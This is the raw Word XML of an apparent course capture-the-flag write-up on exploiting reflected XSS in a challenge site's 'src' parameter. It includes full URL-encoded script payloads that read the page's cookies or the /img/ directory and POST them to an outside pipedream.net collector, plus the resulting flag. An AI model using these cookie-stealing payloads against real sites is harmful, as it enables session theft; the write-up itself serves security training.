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1CFB" w14:textId="48A7AB7A" w:rsidR="00B94128" w:rsidRDefault="004F4994">
      <w:r>
        <w:t>Initially, XSS was experimented with to modify the “src” parameter on the index.php page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636A39F7" w14:textId="45627F3E" w:rsidR="004F4994" w:rsidRDefault="004F4994">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00042E2F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://chall.seccomp.xyz:8080/index.php?src=;%27%3E</w:t>
        </w:r>
        <w:r w:rsidRPr="00042E2F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>&lt;script&gt;alert(1)&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB84C74" w14:textId="6049C93A" w:rsidR="004F4994" w:rsidRDefault="004F4994">
      <w:r>
        <w:t xml:space="preserve">However, this did not work. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304BF671" w14:textId="09B99BD4" w:rsidR="004F4994" w:rsidRDefault="004F4994">
      <w:r w:rsidRPr="004F4994">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68A73CE9" wp14:editId="1F66A42F">
            <wp:extent cx="5731510" cy="59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BAC1" w14:textId="73DDF009" w:rsidR="004F4994" w:rsidRDefault="004F4994">
      <w:r>
        <w:t xml:space="preserve">Alert(1) was changed to a console.log(“test”) instead, and it worked, “test” was printed on the console, therefore this established that XSS is a viable vulnerability to exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E7924" w14:textId="0AD01955" w:rsidR="004F4994" w:rsidRDefault="004F4994">
      <w:r w:rsidRPr="004F4994">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62F642EC" wp14:editId="1955C76B">
            <wp:extent cx="5731510" cy="1498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93F7" w14:textId="4D8BE5CA" w:rsidR="004F4994" w:rsidRDefault="004F4994"/>
    <w:p w14:paraId="0AFB58D8" w14:textId="1DAF9DAA" w:rsidR="004F4994" w:rsidRDefault="004F4994">
      <w:r>
        <w:t>Based on the problem statement, there were 2 scenarios being considered. The flag could be hidden in the /img/ directory as an image file or the flag could be a cookie in the /reporturl.php page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754045E4" w14:textId="540ACE64" w:rsidR="004F4994" w:rsidRDefault="004F4994">
      <w:r>
        <w:t xml:space="preserve">After testing the url input in the /report.php page, it was deducted that most likely the link can has to contain </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00042E2F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://chall.seccomp.xyz:8080/index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and since XSS works, a payload can be injected into the ‘src’ parameter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9CAC05" w14:textId="328F2DB1" w:rsidR="004F4994" w:rsidRDefault="004F4994">
      <w:r>
        <w:t xml:space="preserve">Another consideration that had to be taken into account was how to retrieve the response data. Therefore, RequestBin was used to listen and receive </w:t>
      </w:r>
      <w:r w:rsidR="00E56270">
        <w:t xml:space="preserve">the response. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D8A596" w14:textId="57E64577" w:rsidR="00E56270" w:rsidRDefault="00E56270">
      <w:r>
        <w:t>First scenario: retrieving contents from /img/ directory. The following url was given to the /report.php input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3803CFBB" w14:textId="0EB73B40" w:rsidR="00E56270" w:rsidRDefault="00E56270">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00042E2F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://chall.seccomp.xyz:8080/index.php?src=;%27alt=%27test%27%3E%3Cp%3EHello%3C/p%3E%3Cscript%3Evar%20yourServer%20%3D%20%22https://eoqy0eayg1oyvp7.m.pipedream.net%2Fxyz123%22%3Bfetch(%22%2Fimg%2F%22).then(response%20%3D%3E%20response.text()).then(data%20%3D%3E%20%7Bfetch(yourServer%2C%20%7Bmethod%3A%20%22POST%22%2Cheaders%3A%20%7B%22Content-Type%22%3A%20%22application%2Fx-www-form-urlencoded%22%7D%2Cbody%3A%20%22data%3D%22%20%2B%20encodeURIComponent(data)%7D)%3B%7D)%3B%3C%2Fscript%3E</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="339A9D1E" w14:textId="3374F392" w:rsidR="00E56270" w:rsidRDefault="00E56270"/>
    <w:p w14:paraId="28B0FB23" w14:textId="1AE53357" w:rsidR="00E56270" w:rsidRDefault="00E56270">
      <w:r>
        <w:t>This tried to retrieve the content of /img/ and sends a POST request to the RequestBin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF40A2" w14:textId="50142A3D" w:rsidR="00E56270" w:rsidRDefault="00E56270">
      <w:r>
        <w:t xml:space="preserve">However, a 403 code was the response, thus showing that access to /img/ is forbidden. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A5435F" w14:textId="4E3B20E5" w:rsidR="00E56270" w:rsidRDefault="00E56270">
      <w:r w:rsidRPr="00E56270">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A1E57B0" wp14:editId="12FB5010">
            <wp:extent cx="5731510" cy="356997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C0A" w14:textId="712B4638" w:rsidR="00E56270" w:rsidRDefault="00E56270"/>
    <w:p w14:paraId="41216883" w14:textId="6C5FE09E" w:rsidR="00E56270" w:rsidRDefault="00E56270">
      <w:r>
        <w:t>Therefore, this eliminates the first possibility. Next, an attempt was made to retrieve the document’s cookies. The following url was given:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3538EC55" w14:textId="394F4F18" w:rsidR="00E56270" w:rsidRDefault="00E56270">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00042E2F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://chall.seccomp.xyz:8080/index.php?src=;%27alt=%27test%27%3E%3Cp%3EHello%3C/p%3E%3Cscript%3Edocument.addEventListener(%22DOMContentLoaded%22%2C%20function()%20%7Bvar%20yourServer%20%3D%20%22https://eoqy0eayg1oyvp7.m.pipedream.net%2Fxyz123%22%3Bvar%20cookies%20%3D%20document.cookie%3Bif%20(cookies)%20%7Bfetch(yourServer%2C%20%7Bmethod%3A%20%22POST%22%2Cheaders%3A%20%7B%22Content-Type%22%3A%20%22application%2Fx-www-form-urlencoded%22%7D%2Cbody%3A%20%22data%3D%22%20%2B%20encodeURIComponent(cookies)%7D).catch(console.error)%3B%7D%7D)%3C%2Fscript%3E</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">This waits for the DOM to be loaded first before the cookies are retrieved then sent to the RequestBin as a POST request. Thereby getting the flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D0161C"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ECF3F7"/>
        </w:rPr>
        <w:t>flag=CZ4067{Y0u-JusT_XsS-ed}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E31209" w14:textId="3540FFDA" w:rsidR="00E56270" w:rsidRDefault="00E56270">
      <w:r w:rsidRPr="00E56270">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19A4178E" wp14:editId="46DB87DE">
            <wp:extent cx="5731510" cy="272732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94"/>
    <w:rsid w:val="00160F1F"/>
    <w:rsid w:val="004F4994"/>
    <w:rsid w:val="00B94128"/>
    <w:rsid w:val="00E5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9CF2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{167CDBED-9999-46FD-A51F-F51693F5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ll.seccomp.xyz:8080/index.php?src=;%27alt=%27test%27%3E%3Cp%3EHello%3C/p%3E%3Cscript%3Evar%20yourServer%20%3D%20%22https://eoqy0eayg1oyvp7.m.pipedream.net%2Fxyz123%22%3Bfetch(%22%2Fimg%2F%22).then(response%20%3D%3E%20response.text()).then(data%20%3D%3E%20%7Bfetch(yourServer%2C%20%7Bmethod%3A%20%22POST%22%2Cheaders%3A%20%7B%22Content-Type%22%3A%20%22application%2Fx-www-form-urlencoded%22%7D%2Cbody%3A%20%22data%3D%22%20%2B%20encodeURIComponent(data)%7D)%3B%7D)%3B%3C%2Fscript%3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hall.seccomp.xyz:8080/index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chall.seccomp.xyz:8080/index.php?src=;%27alt=%27test%27%3E%3Cp%3EHello%3C/p%3E%3Cscript%3Edocument.addEventListener(%22DOMContentLoaded%22%2C%20function()%20%7Bvar%20yourServer%20%3D%20%22https://eoqy0eayg1oyvp7.m.pipedream.net%2Fxyz123%22%3Bvar%20cookies%20%3D%20document.cookie%3Bif%20(cookies)%20%7Bfetch(yourServer%2C%20%7Bmethod%3A%20%22POST%22%2Cheaders%3A%20%7B%22Content-Type%22%3A%20%22application%2Fx-www-form-urlencoded%22%7D%2Cbody%3A%20%22data%3D%22%20%2B%20encodeURIComponent(cookies)%7D).catch(console.error)%3B%7D%7D)%3C%2Fscript%3E" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://chall.seccomp.xyz:8080/index.php?src=;%27%3E%3cscript%3ealert(1)%3c/scrip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#LEE XUANHUI#</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>#LEE XUANHUI#</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-23T04:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-23T04:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>